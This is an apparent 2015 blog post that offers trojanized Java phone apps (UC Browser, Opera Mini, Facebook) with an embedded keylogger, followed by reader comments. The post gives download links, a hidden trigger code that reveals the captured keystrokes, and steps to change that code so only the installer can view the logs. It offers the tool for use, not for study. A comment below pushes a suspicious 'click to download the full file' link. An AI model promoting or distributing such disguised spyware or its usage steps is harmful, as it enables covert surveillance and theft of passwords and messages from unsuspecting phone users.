• youtube
  • RSS
Latest Post
Loading...

January 18, 2015

Keylogger For Java [ Advanced Feature ]

in Java


Now You Can Use Keylogger In Java Phone . Actually I Embedded Keylogger In Some Java App . This Keylogger Is Totally Offline . So Why Wait !! Let's Use It .





Step 01 : Download Apps

Here I'm Giving Three App Which Are Embedded With Keylogger .
>> UC Browser 9.5 :
Link : UC Browser 9.5_Keylog -ARSDK.jar

>> Opera Mini 4.5 :
Link : Opera Mini 4.5_Keylog -ARSDK.jar

>> Facebook 3.4 :
Link : Facebook 3.4_Keylog -ARSDK.jar

>> UCLegend :
Link :  UC Legend With Keylogger



Step 02 : Open Keylogger


Open Any App From Those . Then Go To Any Text Field In Full Screen Mode & Type " Xg3 " Press Ok or Done . You Can See All The Text Which Are Typed In That Browser .


Step 03 : Change Key 

Just Open Keylogger , Then Go To Option > Change Key To Set Your Own Key From " Xg3 " To Any Thing .  So That No Body Can See Key-logs Without You . 






Let's Watch The Video ( PC View) :






Mobile User Download This Video . It's Specially Converted And Rotated For Mobile Users .








5 comments




TOO BAD, the links provided above are not working. I tried it and just a suggestion, do not waste your time guys! Good news is that, I already found the real file, after some searching all around. I want to ease your burden looking, so I am just giving you the real download link.


CLICK THIS LINK TO DOWNLOAD THE FULL FILE

CLICK THIS LINK TO DOWNLOAD THE FULL FILE


I JUST WISH YOU HAVE A GREAT DAY AND ENJOY! HOPE I REALLY HELPED :)

Nice apps bro thanks ..
Working good ..
Nd can you give me whats app handler for nokia xt-01

Can you tell me trick to make handler app . Jar